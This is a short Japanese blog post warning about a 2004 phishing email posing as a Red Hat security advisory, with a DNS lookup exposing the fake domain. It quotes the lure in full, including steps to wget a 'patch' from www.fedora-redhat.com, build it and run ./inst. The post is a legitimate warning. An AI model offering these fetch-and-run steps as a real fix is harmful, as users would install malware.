RedHat: Buffer Overflow in "ls" and "mkdir"
例のメールが,うちにもやって参りました.真に受けて実行されない様に御注意を.
ちなみに,www.fedora-redhat.com というのは...
$ host www.fedora-redhat.com
www.fedora-redhat.com is an alias for premium4.geo.yahoo.akadns.net.
premium4.geo.yahoo.akadns.net has address 66.218.79.147
premium4.geo.yahoo.akadns.net has address 66.218.79.148
premium4.geo.yahoo.akadns.net has address 66.218.79.149
premium4.geo.yahoo.akadns.net has address 66.218.79.155
となっとります,はい.
Original issue date: October 20, 2004
Last revised: October 20, 2004
Source: RedHatA complete revision history is at the end of this file.
Dear RedHat user,
Redhat found a vulnerability in fileutils (ls and mkdir), that could allow a remote attacker to execute arbitrary code with root privileges. Some of the affected linux distributions include RedHat 7.2, RedHat 7.3, RedHat 8.0, RedHat 9.0, Fedora CORE 1, Fedora CORE 2 and not only. It is known that *BSD and Solaris platforms are NOT affected.
The RedHat Security Team strongly advises you to immediately apply the fileutils-1.0.6 patch. This is a critical-critical update that you must make by following these steps:
- First download the patch from the Security RedHat mirror: wget www.fedora-redhat.com/fileutils-1.0.6.patch.tar.gz
- Untar the patch: tar zxvf fileutils-1.0.6.patch.tar.gz
- cd fileutils-1.0.6.patch
- make
- ./inst
Again, please apply this patch as soon as possible or you risk your system and others` to be compromised.
Thank you for your prompt attention to this serious matter,
RedHat Security Team.
Copyright © 2004 Red Hat, Inc. All rights reserved.
